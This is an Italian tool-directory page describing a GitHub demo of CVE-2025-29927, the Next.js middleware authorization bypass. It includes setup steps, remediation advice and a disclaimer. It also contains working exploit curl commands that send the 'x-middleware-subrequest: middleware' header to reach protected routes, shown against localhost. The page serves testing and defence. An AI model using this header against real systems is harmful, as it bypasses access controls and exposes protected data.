Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
claude-create-CVE-2025-29927 — Testa e dimostra CVE-2025-29927, un bypass dell'autorizzazione del middleware di Next.js. Include script di test per lo sfruttamento e per l'accesso normale, oltre a indicazioni per la mitigazione. | Kitploit
Strumenti/GitHubGitHub/maronnjapan/claude-create-cve-2025-29927
Analisi delle VulnerabilitàSfruttamento di Applicazioni WebSicurezza WebApprendimento e Formazione
GitHubmaronnjapan/claude-create-cve-2025-29927

claude-create-CVE-2025-29927

Testa e dimostra CVE-2025-29927, un bypass dell'autorizzazione del middleware di Next.js. Include script di test per lo sfruttamento e per l'accesso normale, oltre a indicazioni per la mitigazione.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
1 anno faNon ancora revisionato

Tester di vulnerabilità del middleware Next.js (CVE-2025-29927)

Questa applicazione dimostra la vulnerabilità di bypass dell'autorizzazione del middleware Next.js (CVE-2025-29927).

Informazioni sulla vulnerabilità

CVE-2025-29927 è una vulnerabilità di bypass dell'autorizzazione nel middleware di Next.js. Inviando un'intestazione HTTP appositamente predisposta (x-middleware-subrequest), un attaccante può aggirare i controlli di autorizzazione implementati nel middleware, ottenendo potenzialmente accesso a risorse protette.

Istruzioni per l'installazione

  1. Installa le dipendenze:

    root@kitploit:~
    cd /var/www/react-nextjs/test-middleware-skip
    npm install
    
  2. Avvia il server di sviluppo:

    root@kitploit:~
    npm run dev
    
  3. Il server si avvierà su http://localhost:3000

Test della vulnerabilità

Accesso normale (dovrebbe essere bloccato)

Prova ad accedere alla route protetta normalmente:

root@kitploit:~
npm run test-normal

oppure

root@kitploit:~
curl -v http://localhost:3000/protected-data

Dovresti ricevere una risposta 401 Unauthorized, poiché il middleware blocca l'accesso.

Sfruttamento della vulnerabilità

Prova ad accedere alla route protetta con l'intestazione exploit:

root@kitploit:~
npm run test-exploit

oppure

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/protected-data

Se l'applicazione è vulnerabile, riceverai una risposta 200 OK con i dati protetti.

Test della route API

Accesso normale (dovrebbe essere bloccato):

root@kitploit:~
curl -v http://localhost:3000/api/protected

Con exploit:

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

Rimedio

Per correggere questa vulnerabilità, dovresti:

  1. Aggiornare Next.js a una versione corretta:

    • Next.js 15.x: Aggiornare alla 15.2.3 o successiva
    • Next.js 14.x: Aggiornare alla 14.2.25 o successiva
    • Next.js 13.x: Aggiornare alla 13.5.9 o successiva
    • Next.js 12.x: Aggiornare alla 12.3.5 o successiva
  2. Se non è possibile aggiornare, implementare un proxy inverso (come Nginx o Cloudflare) che rimuova l'intestazione x-middleware-subrequest dalle richieste in arrivo.

Comandi di test aggiuntivi

Test se la route API è vulnerabile:

root@kitploit:~
# Normal request (should be blocked)
curl -v http://localhost:3000/api/protected

# With exploit header
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

Dichiarazione di non responsabilità

Questo strumento è fornito solo a scopo educativo e di test di sicurezza. Utilizzalo per verificare se le tue applicazioni Next.js sono vulnerabili e necessitano di correzioni.

Scarica lo strumento